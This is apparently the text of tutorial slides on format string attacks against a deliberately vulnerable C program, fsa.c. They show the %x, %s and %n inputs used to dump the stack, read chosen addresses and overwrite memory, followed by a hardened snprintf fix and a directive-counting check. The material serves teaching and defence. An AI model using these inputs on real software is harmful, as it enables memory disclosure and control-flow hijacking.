This document discusses format string attacks and how they can be exploited. It provides an example program (fsa.c) with a format string vulnerability. By compiling the program without protections and disabling ASLR, an attacker can view the program stack using different format strings. This allows viewing memory at any location and overwriting arbitrary memory by exploiting the %n conversion. A format string vulnerability can therefore be used to overwrite return addresses and execute shellcode.
2. About Me
• Studying at National Chung Cheng University
• Simulator of a 5-axis CNC machine tool
• CUDA programming for real-time collision detection
• 若渴計畫 & MOSUT
3. Outline
• Illustrating format string vulnerabilities
• A case study
  • fsa.c
  • Compile and set up an insecure environment
  • Viewing the stack
  • Viewing memory at any location
  • Overwriting of arbitrary memory
• So, you can…
10. Viewing the Stack: "%x.%x.%x.%x.%x"
• Format string = %x.%x.%x.%x.%x
• snprintf(buf, sizeof buf, argv[1])
  => snprintf(buf, sizeof buf, "%x.%x.%x.%x.%x")
• [Stack diagram: heap, buffer pointer, buffer length, argv[1] pointer, then the values b7ff3fec, bfffff3b4, 0, x = 97 = 'a', and buf itself; each %x fetches the next value from the stack]
• The execution order of "copy" and "fetch" is switched by the OS
• buf[100]=b7ff3fec.bfffff3b4.0.61.66663762(ff7b)
11. Viewing the Stack: "aaaa.%x.%x.%x.%x.%x"
• Format string = aaaa.%x.%x.%x.%x.%x
• 'a' is 0x61 in ASCII
• snprintf(buf, sizeof buf, "aaaa.%x.%x.%x.%x.%x")
• [Stack diagram: heap, buffer pointer, buffer length, argv[1] pointer; the five %x fetch b7ff3fec, bffff3a4, 0, x = 97 = 'a', and the start of buf]
• buf[100]=aaaa.b7ff3fec.bffff3a4.0.61.61616161
12. Viewing Memory at Any Location
• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%x
• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%s
• [Stack diagram: x = 97 = 'a'; buf[0] is at bffff2f8 and holds the bytes bffff2f8; the final %s reads from that address]
13. Overwriting of Arbitrary Memory
• The %n field was encountered in the format string
• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%n
• [Stack diagram: 26(??) alignment; buf[0] at bffff2f8; with %s, x = 97 = 'a'; with %n, x = 28 = 0x1c]
15. You can overwrite arbitrary memory if there are format string vulnerabilities
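As an added defensive example (not from the slides or fsa.c), the vulnerable snprintf call from the case study is shown beside the hardened form that removes the bug, together with a hypothetical `count_directives` helper a defender can use to flag untrusted input that carries conversion specifiers:

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern from fsa.c: untrusted argv[1] becomes the format
 * string, so %x, %s and %n inside the input are interpreted:
 *     snprintf(buf, sizeof buf, argv[1]);
 * Shown only in this comment; calling it with attacker-controlled
 * input is undefined behaviour. */

/* Hardened form: the format is a constant and the untrusted text is a
 * plain argument, so it is copied verbatim. Returns 1 if truncated. */
int copy_untrusted(char *buf, size_t n, const char *user)
{
    int written = snprintf(buf, n, "%s", user);
    return written < 0 || (size_t)written >= n;
}

/* Detection helper (hypothetical): counts the conversion directives an
 * input would introduce if it were ever used as a format string.
 * "%%" is a literal percent sign and is not counted. A non-zero count
 * in data that must never be a format string is worth logging. */
int count_directives(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent: skip both characters */
            s++;
            continue;
        }
        count++;
    }
    return count;
}

int main(void)
{
    char buf[100];
    const char *input = "aaaa.%x.%x.%x.%x.%x";   /* constructed sample */
    copy_untrusted(buf, sizeof buf, input);
    printf("copied literally: %s\n", buf);
    printf("directives in input: %d\n", count_directives(input));
    return 0;
}
```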